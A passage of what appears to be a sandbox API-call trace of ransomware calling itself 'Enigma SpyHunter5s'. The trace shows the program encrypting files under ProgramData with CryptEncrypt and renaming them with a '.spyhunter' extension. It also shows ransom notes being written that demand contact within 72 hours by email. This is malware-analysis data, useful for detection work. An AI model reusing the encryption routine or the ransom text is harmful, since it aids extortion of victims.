lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.741] GetProcessHeap () returned 0x2c0000 [0146.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f688d0 | out: hHeap=0x2c0000) returned 1 [0146.741] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eee0 | out: pbBuffer=0x57eee0) returned 1 [0146.741] GetProcessHeap () returned 0x2c0000 [0146.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.742] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eed8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eed8*=0x30) returned 1 [0146.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.742] GetProcessHeap () returned 0x2c0000 [0146.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.742] GetProcessHeap () returned 0x2c0000 [0146.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f687b8 | out: hHeap=0x2c0000) returned 1 [0146.742] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eed8 | out: pbBuffer=0x57eed8) returned 1 [0146.742] GetProcessHeap () returned 0x2c0000 [0146.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.742] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eed0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eed0*=0x30) returned 1 [0146.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.744] GetProcessHeap () returned 0x2c0000 [0146.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.744] GetProcessHeap () returned 0x2c0000 [0146.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f689e8 | out: hHeap=0x2c0000) returned 1 [0146.744] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eed8 | out: pbBuffer=0x57eed8) returned 1 [0146.744] GetProcessHeap () returned 0x2c0000 [0146.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.744] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eed0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eed0*=0x30) returned 1 [0146.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.744] GetProcessHeap () returned 0x2c0000 [0146.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.744] GetProcessHeap () returned 0x2c0000 [0146.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68470 | out: hHeap=0x2c0000) returned 1 [0146.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0146.745] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.745] WriteFile (in: hFile=0xb0, lpBuffer=0x57ee07*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef30, lpOverlapped=0x0 | out: lpBuffer=0x57ee07*, lpNumberOfBytesWritten=0x57ef30*=0x127, lpOverlapped=0x0) returned 1 [0146.746] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.746] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef30, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef30*=0x2ac, lpOverlapped=0x0) returned 1 [0146.746] CloseHandle (hObject=0xb0) returned 1 [0146.746] GetProcessHeap () returned 0x2c0000 [0146.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe93a0 | out: hHeap=0x2c0000) returned 1 [0146.746] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eed0 | out: pbBuffer=0x57eed0) returned 1 [0146.746] GetProcessHeap () returned 0x2c0000 [0146.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.746] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eec8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eec8*=0x30) returned 1 [0146.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.746] GetProcessHeap () returned 0x2c0000 [0146.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.747] GetProcessHeap () returned 0x2c0000 [0146.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff9a68 | out: hHeap=0x2c0000) returned 1 [0146.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0146.842] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.842] WriteFile (in: hFile=0x178, lpBuffer=0x57edff*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef28, lpOverlapped=0x0 | out: lpBuffer=0x57edff*, lpNumberOfBytesWritten=0x57ef28*=0x127, lpOverlapped=0x0) returned 1 [0146.843] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.843] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef28, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef28*=0x2ac, lpOverlapped=0x0) returned 1 [0146.843] CloseHandle (hObject=0x178) returned 1 [0146.843] GetProcessHeap () returned 0x2c0000 [0146.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feed40 | out: hHeap=0x2c0000) returned 1 [0146.843] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eec8 | out: pbBuffer=0x57eec8) returned 1 [0146.843] GetProcessHeap () returned 0x2c0000 [0146.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.843] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eec0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eec0*=0x30) returned 1 [0146.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.869] GetProcessHeap () returned 0x2c0000 [0146.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.869] GetProcessHeap () returned 0x2c0000 [0146.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc1898 | out: hHeap=0x2c0000) returned 1 [0146.869] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eec0 | out: pbBuffer=0x57eec0) returned 1 [0146.869] GetProcessHeap () returned 0x2c0000 [0146.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.869] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eeb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eeb8*=0x30) returned 1 [0146.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.037] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 122 [0147.037] StrStrW (lpFirst="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0147.037] GetProcessHeap () returned 0x2c0000 [0147.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0147.037] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ee7c*=0x2f, lpOverlapped=0x0) returned 1 [0147.038] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffd1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.038] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x57ee7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ee7c*=0x2f, lpOverlapped=0x0) returned 1 [0147.038] GetProcessHeap () returned 0x2c0000 [0147.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0147.038] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.038] WriteFile (in: hFile=0x178, lpBuffer=0x57eebc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee7c, lpOverlapped=0x0 | out: lpBuffer=0x57eebc*, lpNumberOfBytesWritten=0x57ee7c*=0x4, lpOverlapped=0x0) returned 1 [0147.038] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee7c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee7c*=0x30, lpOverlapped=0x0) returned 1 [0147.039] CloseHandle (hObject=0x178) returned 1 [0147.039] GetProcessHeap () returned 0x2c0000 [0147.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.039] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter") returned 132 [0147.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter")) returned 1 [0147.039] GetProcessHeap () returned 0x2c0000 [0147.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.040] GetProcessHeap () returned 0x2c0000 [0147.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.040] GetProcessHeap () returned 0x2c0000 [0147.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf928 | out: hHeap=0x2c0000) returned 1 [0147.040] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eec0 | out: pbBuffer=0x57eec0) returned 1 [0147.040] GetProcessHeap () returned 0x2c0000 [0147.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.040] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eeb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eeb8*=0x30) returned 1 [0147.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0147.056] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 80 [0147.056] StrStrW (lpFirst="Help_MValidator.Lck", lpSrch=".txt") returned 0x0 [0147.056] GetProcessHeap () returned 0x2c0000 [0147.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.056] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ee7c*=0x4, lpOverlapped=0x0) returned 1 [0147.057] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.057] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ee7c*=0x4, lpOverlapped=0x0) returned 1 [0147.057] GetProcessHeap () returned 0x2c0000 [0147.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.058] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.058] WriteFile (in: hFile=0x9c, lpBuffer=0x57eebc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee7c, lpOverlapped=0x0 | out: lpBuffer=0x57eebc*, lpNumberOfBytesWritten=0x57ee7c*=0x4, lpOverlapped=0x0) returned 1 [0147.058] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee7c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee7c*=0x30, lpOverlapped=0x0) returned 1 [0147.058] CloseHandle (hObject=0x9c) returned 1 [0147.058] GetProcessHeap () returned 0x2c0000 [0147.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.058] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.spyhunter") returned 90 [0147.058] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck.spyhunter")) returned 1 [0147.059] GetProcessHeap () returned 0x2c0000 [0147.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.059] GetProcessHeap () returned 0x2c0000 [0147.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.059] GetProcessHeap () returned 0x2c0000 [0147.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f64f38 | out: hHeap=0x2c0000) returned 1 [0147.059] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eeb8 | out: pbBuffer=0x57eeb8) returned 1 [0147.059] GetProcessHeap () returned 0x2c0000 [0147.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.059] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eeb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eeb0*=0x30) returned 1 [0147.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0147.060] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 79 [0147.060] StrStrW (lpFirst="Help_MTOC_help.H1H", lpSrch=".txt") returned 0x0 [0147.060] GetProcessHeap () returned 0x2c0000 [0147.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.060] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ee74*=0x2800, lpOverlapped=0x0) returned 1 [0147.095] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.095] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ee74*=0x2800, lpOverlapped=0x0) returned 1 [0147.095] GetProcessHeap () returned 0x2c0000 [0147.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.095] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.095] WriteFile (in: hFile=0x9c, lpBuffer=0x57eeb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee74, lpOverlapped=0x0 | out: lpBuffer=0x57eeb4*, lpNumberOfBytesWritten=0x57ee74*=0x4, lpOverlapped=0x0) returned 1 [0147.107] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee74, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee74*=0x30, lpOverlapped=0x0) returned 1 [0147.107] CloseHandle (hObject=0x9c) returned 1 [0147.107] GetProcessHeap () returned 0x2c0000 [0147.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.107] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.spyhunter") returned 89 [0147.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h.spyhunter")) returned 1 [0147.108] GetProcessHeap () returned 0x2c0000 [0147.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.108] GetProcessHeap () returned 0x2c0000 [0147.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.108] GetProcessHeap () returned 0x2c0000 [0147.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30098 | out: hHeap=0x2c0000) returned 1 [0147.108] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eeb8 | out: pbBuffer=0x57eeb8) returned 1 [0147.108] GetProcessHeap () returned 0x2c0000 [0147.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.108] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eeb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eeb0*=0x30) returned 1 [0147.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0147.109] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 82 [0147.109] StrStrW 